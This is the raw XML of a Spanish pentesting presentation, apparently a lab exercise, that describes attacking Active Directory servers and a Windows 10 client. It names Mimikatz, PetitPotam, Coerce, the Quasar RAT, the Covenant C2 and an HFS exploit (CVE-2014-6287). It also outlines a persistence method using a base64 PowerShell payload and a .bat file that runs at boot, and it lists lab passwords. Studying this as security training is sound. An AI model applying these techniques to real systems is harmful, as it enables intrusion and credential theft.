        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41094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BA852-7088-D898-D28B-DF4020DB0C20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Descripción de la empresa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49449E5D-FE16-E56D-9485-9D14F504FB91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200">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 empresa para la que voy realizar el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pentesting</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es Google, concretamente su sede en Madrid, en su departamento de Administración.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200">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Esta parte de la empresa tiene 56 empleados, fuimos contactados por la gerente de ciberseguridad de la empresa en Madrid, Eva Lorenzo Casado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200">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cuanto a los sistemas sobre los que voy a realizar la prueba de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pentesting</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son 3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200">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 que haré será probar la seguridad de sus dos máquinas de Active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Directory</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y una máquina cliente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200">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este caso se elegio hacer la prueba así porque todos los equipos cliente son los mismos, es decir tienen las mismas aplicaciones instaladas y son clones uno de otro, por lo tanto con realizar las pruebas en uno sabríamos, las vulnerabilidades de los demás porque son iguales.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200">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2341931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95AF50E-8351-ABAF-203F-4275A61BEF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="497305"/>
            <a:ext cx="11129655" cy="5903495"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Consiguiendo el acceso, al ejecutar el exe:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1395CE-DD04-6E05-C657-4B6929DB654E}"/>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5980" y="1331495"/>
            <a:ext cx="5400040" cy="4797524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2239644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67B02EC-D38E-11C0-D44A-B1860FF36D19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="719558"/>
            <a:ext cx="10872787" cy="5476034"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2977410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EB71B90-01CE-0EAD-4763-730E509C15A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="698834"/>
            <a:ext cx="10920412" cy="5500020"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3443975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E423FAC-7D49-9F34-5FC0-511CED511DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="690323"/>
            <a:ext cx="11017250" cy="5548792"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27940024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F2BE2C4-FC2F-2410-ED20-1BC6C224C013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="698950"/>
            <a:ext cx="10856912" cy="5468038"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3808176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AFF922B-4460-796A-12D5-A2A5ED576E9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="513347"/>
            <a:ext cx="11113613" cy="5951621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para crear la persistencia en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> tenemos una pestaña que se llama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, que son las tareas que podemos ejecutar en la máquina comprometida.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>En este caso ejecutaremos un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de Powershell que nos permitirá conectarnos a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE183CB0-6EB7-B244-2CB0-0BC8011BD05A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136750" y="2365057"/>
            <a:ext cx="6645910" cy="3347085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2386659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582C5DE-231B-8C86-8CAD-5A6429937C5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="433137"/>
            <a:ext cx="11113613" cy="6031831"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Lo que haré es generar un código de PowerShell para conectarme a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> ese código estará en base64.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D66F081F-8E38-7958-B6C5-156C5171EF74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773045" y="2042795"/>
            <a:ext cx="6645910" cy="2772410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795113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8D267D3-370D-D5A0-BDA9-E28CB396C00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="481263"/>
            <a:ext cx="10985277" cy="5983705"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Generando un .bat que si iniciará al arrancar el sistema:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA9A2FC-F2B7-F9FB-7A83-70F64F42672A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773045" y="2345690"/>
            <a:ext cx="6645910" cy="2166620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1861164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0E2EC4D-A2F8-FC2F-2BBA-B09CE83E238B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="288759"/>
            <a:ext cx="11049445" cy="6272462"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Fin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2399791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DE4A4D-A9AE-92F7-211D-4AB7AEF4AC6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="497305"/>
            <a:ext cx="8596668" cy="5544057"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200">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Estos equipos tienen estas contraseñas y usuarios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Equipos Windows Server 2019: Usuario Administrador del dominio ‘Administrador’ con contraseña ‘abc123.’ y usuario sin permisos ‘Alesander’ con contraseña abc123. .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Equipo Windows10 20H2: Usuarios ‘Alesander’ siendo administrador y un usuario normal ‘usuario’, con contraseñas ‘abc123.’ Y ‘123456789’ respectivamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES"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kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Planteamiento del problema:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" kern="100" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>La empresa Google y yo llegamos a un acuerdo para realizar una prueba de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> a sus equipos del departamento de Administración, con motivo de comprobar la seguridad de este departamento, debido a un reciente ataque sobre el sistema mediante un troyano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Con lo cual se busca proteger el sistema para evitar fugas de datos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Como esta empresa trabajo con datos privados de los usuarios de su navegador y aplicaciones, tienen que cumplir con la normativa europea GDPR que entró en vigor en mayo de 2018 y en España la ley orgánica 3/2018, de 5 de diciembre, de Protección de datos Personales y garantía de derechos digitales.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152696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1DDB76D-3E58-0103-5B42-40BE16B96057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="352927"/>
            <a:ext cx="8596668" cy="5688436"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Máquinas usadas para el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> ya aplicaciones:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Una máquina Parrot OS con una IP 192,168,1,44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Una máquina Kali Linux con una IP 192,168,1,58</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Nmap</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escaneo de red.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Nessus escaneo de vulnerabilidades.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Mimikatz</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para escalada de privilegios y robo de credenciales.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Coerce, es un script para escalada de credenciales que abusa del protocolo MS-DFSNM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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PetitPotam</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script para escalada de privilegios que abusa del protocolo MS-EFSRPC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Quasar</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que es un RAT, para ganar persistencia en el equipo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Covenant</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que es un C2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP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Rejetto</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(HFS) 2.3 (CVE-2014-6287CVE-2014-6287) para ganar acceso al sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">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s-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804695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7CD364-6949-E1A6-9735-B2CECDE4B92F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Recopilación de información</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2ABCFE0-8EBB-35C0-441E-E48C85D30E48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Red:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
